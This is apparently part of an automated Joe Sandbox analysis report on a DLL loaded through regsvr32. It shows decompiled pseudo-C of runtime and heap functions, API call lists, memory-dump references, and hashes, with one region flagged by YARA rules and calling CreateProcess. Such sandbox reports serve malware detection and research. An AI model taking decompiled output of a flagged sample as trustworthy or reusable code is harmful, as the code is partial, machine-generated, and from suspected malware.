                                                                                                      • Associated: 00000003.00000002.320061148.00007FF87C187000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_7ff87c100000_regsvr32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Concurrency::details::EmptyQueue::StructuredWorktype_info::_name_internal_method$char_traits
                                                                                                      • String ID:
                                                                                                      • API String ID: 652137993-0
                                                                                                      • Opcode ID: 110c28662a49dc0ce0b420f88bf91af1763c08d6580e3a8db95f45a47403bc2f
                                                                                                      • Instruction ID: a70d387bb895bf3e4037686aade18361540faadf6b5deb954d7c9d46cacdfd10
                                                                                                      • Opcode Fuzzy Hash: 110c28662a49dc0ce0b420f88bf91af1763c08d6580e3a8db95f45a47403bc2f
                                                                                                      • Instruction Fuzzy Hash: 08113023628A8181DB50DB14E49126BB7A0FBC57D4F901231F6DE87AA9DF3CD1858F50
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 45%
                                                                                                      			E00007FF87FF87C101B40(void* __rax, long long __rcx, long long __rdx, long long __r8, long long _a8, long long _a16, long long _a24) {
                                                                                                      				signed char _t23;
                                                                                                      
                                                                                                      				_a24 = __r8;
                                                                                                      				_a16 = __rdx;
                                                                                                      				_a8 = __rcx;
                                                                                                      				if ((E00007FF87FF87C102250(__rax, _a8, _a16) & 0x000000ff) == 0) goto 0x7c101b97;
                                                                                                      				E00007FF87FF87C1018F0(__rax, _a8);
                                                                                                      				E00007FF87FF87C101BF0(_a16 - __rax, _a8, _a8, _a16 - __rax, _a24);
                                                                                                      				goto 0x7c101be0;
                                                                                                      				r8d = 0;
                                                                                                      				_t23 = E00007FF87FF87C1022B0(_t31, _a8, _a24); // executed
                                                                                                      				if ((_t23 & 0x000000ff) == 0) goto 0x7c101bdb;
                                                                                                      				E00007FF87FF87C1018F0(_t31, _a8);
                                                                                                      				E00007FF87FF87C1011E0(_t31, _a16, _a24);
                                                                                                      				return E00007FF87FF87C1023A0(_t31, _a8, _a24);
                                                                                                      			}




                                                                                                      0x7ff87c101b40
                                                                                                      0x7ff87c101b45
                                                                                                      0x7ff87c101b4a
                                                                                                      0x7ff87c101b67
                                                                                                      0x7ff87c101b6e
                                                                                                      0x7ff87c101b90
                                                                                                      0x7ff87c101b95
                                                                                                      0x7ff87c101b97
                                                                                                      0x7ff87c101ba4
                                                                                                      0x7ff87c101bae
                                                                                                      0x7ff87c101bb5
                                                                                                      0x7ff87c101bc7
                                                                                                      0x7ff87c101be4

                                                                                                      APIs
                                                                                                        • Part of subcall function 00007FF87C102250: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FF87C10226B
                                                                                                        • Part of subcall function 00007FF87C102250: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FF87C10227C
                                                                                                      • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FF87C101B6E
                                                                                                        • Part of subcall function 00007FF87C1018F0: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FF87C1018FE
                                                                                                      • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FF87C101BB5
                                                                                                      • char_traits.LIBCPMTD ref: 00007FF87C101BC7
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.319732788.00007FF87C101000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF87C100000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.319720606.00007FF87C100000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.319807527.00007FF87C138000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320036966.00007FF87C17E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320042986.00007FF87C182000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320055373.00007FF87C185000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320061148.00007FF87C187000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_7ff87c100000_regsvr32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Concurrency::details::Work$Base::ContextIdentityQueue$EmptyQueue::Structuredchar_traits
                                                                                                      • String ID:
                                                                                                      • API String ID: 872432861-0
                                                                                                      • Opcode ID: 7aa3d2372c1ca0d652da04669d2a978a39a877f23c15b1fa6cc72aa4e53f0d09
                                                                                                      • Instruction ID: 7ef925739d718c094b06b69dd738cffa3bda6df43fb6c86fb088f0d853ac726f
                                                                                                      • Opcode Fuzzy Hash: 7aa3d2372c1ca0d652da04669d2a978a39a877f23c15b1fa6cc72aa4e53f0d09
                                                                                                      • Instruction Fuzzy Hash: 9F11006363CA8181DB40EB56E49156F6360FBC6BC0F106036FE9E47B5ADE2CD4808B50
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 65%
                                                                                                      			E00007FF87FF87C103F18(void* __ecx) {
                                                                                                      				void* __rbx;
                                                                                                      				void* _t12;
                                                                                                      				void* _t17;
                                                                                                      				void* _t18;
                                                                                                      				void* _t19;
                                                                                                      				void* _t20;
                                                                                                      
                                                                                                      				_t2 =  ==  ? 1 :  *0x7c17f1a0 & 0x000000ff;
                                                                                                      				 *0x7c17f1a0 =  ==  ? 1 :  *0x7c17f1a0 & 0x000000ff;
                                                                                                      				E00007FF87FF87C104760(1, _t12, _t17, _t18, _t19, _t20);
                                                                                                      				if (E00007FF87FF87C106AC0() != 0) goto 0x7c103f47;
                                                                                                      				goto 0x7c103f5b; // executed
                                                                                                      				E00007FF87FF87C10A844(_t17); // executed
                                                                                                      				if (0 != 0) goto 0x7c103f59;
                                                                                                      				E00007FF87FF87C106B1C(0);
                                                                                                      				goto 0x7c103f43;
                                                                                                      				return 1;
                                                                                                      			}









                                                                                                      0x7ff87c103f2c
                                                                                                      0x7ff87c103f2f
                                                                                                      0x7ff87c103f35
                                                                                                      0x7ff87c103f41
                                                                                                      0x7ff87c103f45
                                                                                                      0x7ff87c103f47
                                                                                                      0x7ff87c103f4e
                                                                                                      0x7ff87c103f52
                                                                                                      0x7ff87c103f57
                                                                                                      0x7ff87c103f60

                                                                                                      APIs
                                                                                                      • __isa_available_init.LIBCMT ref: 00007FF87C103F35
                                                                                                      • __vcrt_initialize.LIBVCRUNTIME ref: 00007FF87C103F3A
                                                                                                        • Part of subcall function 00007FF87C106AC0: __vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00007FF87C106AC4
                                                                                                        • Part of subcall function 00007FF87C106AC0: __vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00007FF87C106AC9
                                                                                                        • Part of subcall function 00007FF87C106AC0: __vcrt_initialize_locks.LIBVCRUNTIME ref: 00007FF87C106ACE
                                                                                                      • __vcrt_uninitialize.LIBVCRUNTIME ref: 00007FF87C103F52
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.319732788.00007FF87C101000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF87C100000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.319720606.00007FF87C100000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.319807527.00007FF87C138000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320036966.00007FF87C17E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320042986.00007FF87C182000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320055373.00007FF87C185000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320061148.00007FF87C187000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_7ff87c100000_regsvr32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: __isa_available_init__vcrt_initialize__vcrt_initialize_locks__vcrt_initialize_pure_virtual_call_handler__vcrt_initialize_winapi_thunks__vcrt_uninitialize
                                                                                                      • String ID:
                                                                                                      • API String ID: 3388242289-0
                                                                                                      • Opcode ID: 5d9032b98b00912ce65cde94096c8696e72d1c768cb864a179bbf2be0d6f6683
                                                                                                      • Instruction ID: c827a187916f86208b70d45c229e4569db4dd631b16ebfd865c0f63cab48ca93
                                                                                                      • Opcode Fuzzy Hash: 5d9032b98b00912ce65cde94096c8696e72d1c768cb864a179bbf2be0d6f6683
                                                                                                      • Instruction Fuzzy Hash: 0FE01A52E2C18685FF282671E1523BA27A03F17381F8400B9DD7E471C3CE0DA5DA6532
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 37%
                                                                                                      			E00007FF87FF87C113F70() {
                                                                                                      				long long _v24;
                                                                                                      				long long _t5;
                                                                                                      				intOrPtr _t7;
                                                                                                      
                                                                                                      				_v24 = 0;
                                                                                                      				_t7 =  *0x7c17fdd8; // 0x180000000
                                                                                                      				E00007FF87FF87C119600(_t5, "fx", _t7, "DllRegisterServer");
                                                                                                      				_v24 = _t5;
                                                                                                      				ExitProcess(??);
                                                                                                      			}






                                                                                                      0x7ff87c113f74
                                                                                                      0x7ff87c113f84
                                                                                                      0x7ff87c113f92
                                                                                                      0x7ff87c113f97
                                                                                                      0x7ff87c113f9c

                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.319732788.00007FF87C101000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF87C100000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.319720606.00007FF87C100000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.319807527.00007FF87C138000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320036966.00007FF87C17E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320042986.00007FF87C182000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320055373.00007FF87C185000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320061148.00007FF87C187000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_7ff87c100000_regsvr32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExitProcess
                                                                                                      • String ID: DllRegisterServer
                                                                                                      • API String ID: 621844428-1663957109
                                                                                                      • Opcode ID: daa4509797ac003af5991cc102a2f8bbc2bd6225bef9e83475646ccea547d58a
                                                                                                      • Instruction ID: f1438bc55ff8400822956c4fc459d13531d20ed799397f9490e5c54582c86000
                                                                                                      • Opcode Fuzzy Hash: daa4509797ac003af5991cc102a2f8bbc2bd6225bef9e83475646ccea547d58a
                                                                                                      • Instruction Fuzzy Hash: 60D09E72928A82C2E720DB50F84539A63B4FB8A388FC00136D58C47664DF3CD39ACB64
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 68%
                                                                                                      			E00007FF87FF87C10A9DC(intOrPtr* __rax, void* __rcx) {
                                                                                                      				int _t1;
                                                                                                      				intOrPtr _t3;
                                                                                                      				void* _t4;
                                                                                                      				void* _t11;
                                                                                                      				intOrPtr _t14;
                                                                                                      
                                                                                                      				if (__rcx == 0) goto 0x7c10aa17;
                                                                                                      				_t14 =  *0x7c17f930; // 0xe20000, executed
                                                                                                      				_t1 = HeapFree(_t11, ??); // executed
                                                                                                      				if (_t1 != 0) goto 0x7c10aa12;
                                                                                                      				_t3 = E00007FF87FF87C10B34C(GetLastError(), __rax, _t14, __rcx);
                                                                                                      				_t4 = E00007FF87FF87C10B420(__rax);
                                                                                                      				 *__rax = _t3;
                                                                                                      				return _t4;
                                                                                                      			}








                                                                                                      0x7ff87c10a9df
                                                                                                      0x7ff87c10a9eb
                                                                                                      0x7ff87c10a9f2
                                                                                                      0x7ff87c10a9fa
                                                                                                      0x7ff87c10aa04
                                                                                                      0x7ff87c10aa0b
                                                                                                      0x7ff87c10aa10
                                                                                                      0x7ff87c10aa17

                                                                                                      APIs
                                                                                                      • RtlReleasePrivilege.NTDLL(?,?,00000000,00007FF87C10F492,?,?,?,00007FF87C10F4CF,?,?,00000000,00007FF87C10F144,?,?,?,00007FF87C10F077), ref: 00007FF87C10A9F2
                                                                                                      • GetLastError.KERNEL32(?,?,00000000,00007FF87C10F492,?,?,?,00007FF87C10F4CF,?,?,00000000,00007FF87C10F144,?,?,?,00007FF87C10F077), ref: 00007FF87C10A9FC
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.319732788.00007FF87C101000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF87C100000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.319720606.00007FF87C100000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.319807527.00007FF87C138000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320036966.00007FF87C17E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320042986.00007FF87C182000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320055373.00007FF87C185000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320061148.00007FF87C187000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_7ff87c100000_regsvr32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLastPrivilegeRelease
                                                                                                      • String ID:
                                                                                                      • API String ID: 1334314998-0
                                                                                                      • Opcode ID: 1178260e8bffcb175f16ce8929f72affff1d2575aebcf493ec367cb625912061
                                                                                                      • Instruction ID: 315c49d4bdb5fe71037c58089e285cad25c231130464e87717976a271b5ff553
                                                                                                      • Opcode Fuzzy Hash: 1178260e8bffcb175f16ce8929f72affff1d2575aebcf493ec367cb625912061
                                                                                                      • Instruction Fuzzy Hash: 04E08C12F3920282FF08ABB2D8453791190AF86BC4F445038DC1D87392EE2CB8C54334
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.319281932.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CreateProcess
                                                                                                      • String ID:
                                                                                                      • API String ID: 963392458-0
                                                                                                      • Opcode ID: 16f61cbd6d489d93c3999831aad5c05b50de217028ac9f2dcc58791474f8e422
                                                                                                      • Instruction ID: b9dfd44ec2654d149dbfc67a3d285e1c446cc2681133f70a5a1c8efdf6c35088
                                                                                                      • Opcode Fuzzy Hash: 16f61cbd6d489d93c3999831aad5c05b50de217028ac9f2dcc58791474f8e422
                                                                                                      • Instruction Fuzzy Hash: 59415D7090C7848FE7B8DF18D48979ABBE0FB88315F108A1EE48DC7291DB349448CB46
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 50%
                                                                                                      			E00007FF87FF87C1022B0(long long __rax, long long __rcx, long long __rdx, long long _a8, long long _a16, signed char _a24) {
                                                                                                      				long long _v16;
                                                                                                      				signed char _v24;
                                                                                                      				intOrPtr* _t48;
                                                                                                      				intOrPtr* _t50;
                                                                                                      
                                                                                                      				_t48 = __rax;
                                                                                                      				_a24 = r8b;
                                                                                                      				_a16 = __rdx;
                                                                                                      				_a8 = __rcx;
                                                                                                      				E00007FF87FF87C102830(__rax, _a8);
                                                                                                      				if (_t48 - _a16 >= 0) goto 0x7c1022de;
                                                                                                      				E00007FF87FF87C102230(_a8);
                                                                                                      				E00007FF87FF87C102150(_t48, _a8);
                                                                                                      				if ( *_t48 - _a16 >= 0) goto 0x7c102310;
                                                                                                      				E00007FF87FF87C102170(_t48, _a8);
                                                                                                      				E00007FF87FF87C102600(_a8, _a16,  *_t48); // executed
                                                                                                      				goto 0x7c10237a;
                                                                                                      				if ((_a24 & 0x000000ff) == 0) goto 0x7c102366;
                                                                                                      				if (_a16 - 0x10 >= 0) goto 0x7c102366;
                                                                                                      				E00007FF87FF87C102170(_t48, _a8);
                                                                                                      				if (_a16 -  *_t48 >= 0) goto 0x7c102341;
                                                                                                      				_t50 = _a16;
                                                                                                      				_v16 = _t50;
                                                                                                      				goto 0x7c102353;
                                                                                                      				E00007FF87FF87C102170(_t50, _a8);
                                                                                                      				_v16 =  *_t50;
                                                                                                      				E00007FF87FF87C101910(1,  *_t50, _a8, _v16);
                                                                                                      				goto 0x7c10237a;
                                                                                                      				if (_a16 != 0) goto 0x7c10237a;
                                                                                                      				E00007FF87FF87C1023A0( *_t50, _a8, _a16);
                                                                                                      				if (_a16 <= 0) goto 0x7c10238c;
                                                                                                      				_v24 = 1;
                                                                                                      				goto 0x7c102394;
                                                                                                      				_v24 = 0;
                                                                                                      				return _v24 & 0x000000ff;
                                                                                                      			}







                                                                                                      0x7ff87c1022b0
                                                                                                      0x7ff87c1022b0
                                                                                                      0x7ff87c1022b5
                                                                                                      0x7ff87c1022ba
                                                                                                      0x7ff87c1022c8
                                                                                                      0x7ff87c1022d2
                                                                                                      0x7ff87c1022d9
                                                                                                      0x7ff87c1022e3
                                                                                                      0x7ff87c1022f0
                                                                                                      0x7ff87c1022f7
                                                                                                      0x7ff87c102309
                                                                                                      0x7ff87c10230e
                                                                                                      0x7ff87c102317
                                                                                                      0x7ff87c10231f
                                                                                                      0x7ff87c102326
                                                                                                      0x7ff87c102333
                                                                                                      0x7ff87c102335
                                                                                                      0x7ff87c10233a
                                                                                                      0x7ff87c10233f
                                                                                                      0x7ff87c102346
                                                                                                      0x7ff87c10234e
                                                                                                      0x7ff87c10235f
                                                                                                      0x7ff87c102364
                                                                                                      0x7ff87c10236c
                                                                                                      0x7ff87c102375
                                                                                                      0x7ff87c102380
                                                                                                      0x7ff87c102382
                                                                                                      0x7ff87c10238a
                                                                                                      0x7ff87c10238c
                                                                                                      0x7ff87c10239d

                                                                                                      APIs
                                                                                                        • Part of subcall function 00007FF87C102830: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FF87C10283E
                                                                                                        • Part of subcall function 00007FF87C102830: Concurrency::details::SchedulerBase::ThrottlerDispatchBridge.LIBCMTD ref: 00007FF87C10284B
                                                                                                      • _Mtx_guard::~_Mtx_guard.LIBCPMTD ref: 00007FF87C1022D9
                                                                                                        • Part of subcall function 00007FF87C102170: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FF87C10217E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.319732788.00007FF87C101000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF87C100000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.319720606.00007FF87C100000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.319807527.00007FF87C138000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320036966.00007FF87C17E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320042986.00007FF87C182000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320055373.00007FF87C185000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320061148.00007FF87C187000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_7ff87c100000_regsvr32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Concurrency::details::$EmptyQueue::StructuredWork$Base::BridgeDispatchMtx_guardMtx_guard::~_SchedulerThrottler
                                                                                                      • String ID:
                                                                                                      • API String ID: 1903167320-0
                                                                                                      • Opcode ID: 8412a15bbd2f4d89551e98d62f984fcb6a76ab0910fb464f93224fef732d8c49
                                                                                                      • Instruction ID: fe5dc983a2c4239ecb9ed9513a2c21b8828779d885dfaf32564948bec0898d79
                                                                                                      • Opcode Fuzzy Hash: 8412a15bbd2f4d89551e98d62f984fcb6a76ab0910fb464f93224fef732d8c49
                                                                                                      • Instruction Fuzzy Hash: 2B21CE2392CA4181EB249B15E45036EA770FBCB7C4F604476EB9D4B6AACF3DD5C08B60
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 100%
                                                                                                      			E00007FF87FF87C11060C(void* __ecx, intOrPtr* __rax, long long __rbx, long long __rdi, long long __rsi, long long _a8, long long _a16, long long _a24) {
                                                                                                      
                                                                                                      				_a8 = __rbx;
                                                                                                      				_a16 = __rsi;
                                                                                                      				_a24 = __rdi;
                                                                                                      				if (__ecx - 0x2000 < 0) goto 0x7c110654;
                                                                                                      				E00007FF87FF87C10B420(__rax);
                                                                                                      				 *__rax = 9;
                                                                                                      				E00007FF87FF87C109744();
                                                                                                      				return 9;
                                                                                                      			}



                                                                                                      0x7ff87c11060c
                                                                                                      0x7ff87c110611
                                                                                                      0x7ff87c110616
                                                                                                      0x7ff87c110629
                                                                                                      0x7ff87c11062b
                                                                                                      0x7ff87c110635
                                                                                                      0x7ff87c110637
                                                                                                      0x7ff87c110653

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.319732788.00007FF87C101000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF87C100000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.319720606.00007FF87C100000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.319807527.00007FF87C138000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320036966.00007FF87C17E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320042986.00007FF87C182000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320055373.00007FF87C185000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320061148.00007FF87C187000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_7ff87c100000_regsvr32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                      • String ID:
                                                                                                      • API String ID: 3215553584-0
                                                                                                      • Opcode ID: 9630306cbb1685fa6066e691d321c691ce288c67f2e3b59aeca8e9753d6d96fe
                                                                                                      • Instruction ID: 869943bac6e30068caeb94d9386ba9e195b7bb3afa484a35e94c5ccbb0b85aaf
                                                                                                      • Opcode Fuzzy Hash: 9630306cbb1685fa6066e691d321c691ce288c67f2e3b59aeca8e9753d6d96fe
                                                                                                      • Instruction Fuzzy Hash: 28113D33D28642C7E3109B15E44077A63A4FB867C4F690534EA9D47AA2DF3CE8D1CB60
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 37%
                                                                                                      			E00007FF87FF87C10AAD0(void* __eax, signed int __rcx, signed int __rdx) {
                                                                                                      				intOrPtr* _t22;
                                                                                                      				signed int _t29;
                                                                                                      
                                                                                                      				_t29 = __rdx;
                                                                                                      				if (__rcx == 0) goto 0x7c10aaef;
                                                                                                      				_t1 = _t29 - 0x20; // -32
                                                                                                      				_t22 = _t1;
                                                                                                      				if (_t22 - __rdx < 0) goto 0x7c10ab32;
                                                                                                      				_t25 =  ==  ? _t22 : __rcx * __rdx;
                                                                                                      				goto 0x7c10ab16;
                                                                                                      				if (E00007FF87FF87C10E958() == 0) goto 0x7c10ab32;
                                                                                                      				if (E00007FF87FF87C1097EC(_t22,  ==  ? _t22 : __rcx * __rdx) == 0) goto 0x7c10ab32;
                                                                                                      				RtlAllocateHeap(??, ??, ??); // executed
                                                                                                      				if (_t22 == 0) goto 0x7c10ab01;
                                                                                                      				goto 0x7c10ab3f;
                                                                                                      				E00007FF87FF87C10B420(_t22);
                                                                                                      				 *_t22 = 0xc;
                                                                                                      				return 0;
                                                                                                      			}





                                                                                                      0x7ff87c10aad0
                                                                                                      0x7ff87c10aadf
                                                                                                      0x7ff87c10aae3
                                                                                                      0x7ff87c10aae3
                                                                                                      0x7ff87c10aaed
                                                                                                      0x7ff87c10aafb
                                                                                                      0x7ff87c10aaff
                                                                                                      0x7ff87c10ab08
                                                                                                      0x7ff87c10ab14
                                                                                                      0x7ff87c10ab25
                                                                                                      0x7ff87c10ab2e
                                                                                                      0x7ff87c10ab30
                                                                                                      0x7ff87c10ab32
                                                                                                      0x7ff87c10ab37
                                                                                                      0x7ff87c10ab44

                                                                                                      APIs
                                                                                                      • RtlAllocateHeap.NTDLL(?,?,00000000,00007FF87C10BAAE,?,?,?,00007FF87C10B429,?,?,?,?,00007FF87C110426,?,?,00000000), ref: 00007FF87C10AB25
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.319732788.00007FF87C101000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF87C100000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.319720606.00007FF87C100000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.319807527.00007FF87C138000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320036966.00007FF87C17E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320042986.00007FF87C182000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320055373.00007FF87C185000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320061148.00007FF87C187000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_7ff87c100000_regsvr32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AllocateHeap
                                                                                                      • String ID:
                                                                                                      • API String ID: 1279760036-0
                                                                                                      • Opcode ID: 280286a628102559a8464dffd4b609b20cb420f0fe1f18d1be992a8bc7a4b5f6
                                                                                                      • Instruction ID: 6fff5df721f1ae3aad7e9e5b2aa6b7d564a220ce2e5cd2403da9931c6a7d68a5
                                                                                                      • Opcode Fuzzy Hash: 280286a628102559a8464dffd4b609b20cb420f0fe1f18d1be992a8bc7a4b5f6
                                                                                                      • Instruction Fuzzy Hash: 16F06D07B2A60781FF589B62D4113B512867F5ABC4F4C9030CD2E873C1ED2CE8C18230
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 37%
                                                                                                      			E00007FF87FF87C10AA18(intOrPtr* __rax, void* __rcx) {
                                                                                                      
                                                                                                      				if (__rcx - 0xffffffe0 > 0) goto 0x7c10aa63;
                                                                                                      				_t16 =  ==  ? __rax : __rcx;
                                                                                                      				goto 0x7c10aa4a;
                                                                                                      				if (E00007FF87FF87C10E958() == 0) goto 0x7c10aa63;
                                                                                                      				if (E00007FF87FF87C1097EC(__rax,  ==  ? __rax : __rcx) == 0) goto 0x7c10aa63;
                                                                                                      				RtlAllocateHeap(??, ??, ??); // executed
                                                                                                      				if (__rax == 0) goto 0x7c10aa35;
                                                                                                      				goto 0x7c10aa70;
                                                                                                      				E00007FF87FF87C10B420(__rax);
                                                                                                      				 *__rax = 0xc;
                                                                                                      				return 0;
                                                                                                      			}



                                                                                                      0x7ff87c10aa25
                                                                                                      0x7ff87c10aa2f
                                                                                                      0x7ff87c10aa33
                                                                                                      0x7ff87c10aa3c
                                                                                                      0x7ff87c10aa48
                                                                                                      0x7ff87c10aa56
                                                                                                      0x7ff87c10aa5f
                                                                                                      0x7ff87c10aa61
                                                                                                      0x7ff87c10aa63
                                                                                                      0x7ff87c10aa68
                                                                                                      0x7ff87c10aa75

                                                                                                      APIs
                                                                                                      • RtlAllocateHeap.NTDLL(?,?,?,00007FF87C11040D,?,?,00000000,00007FF87C10D8B7,?,?,?,00007FF87C10A427,?,?,?,00007FF87C10A31D), ref: 00007FF87C10AA56
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.319732788.00007FF87C101000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF87C100000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.319720606.00007FF87C100000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.319807527.00007FF87C138000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320036966.00007FF87C17E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320042986.00007FF87C182000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320055373.00007FF87C185000.00000002.00000001.01000000.00000006.sdmpDownload File
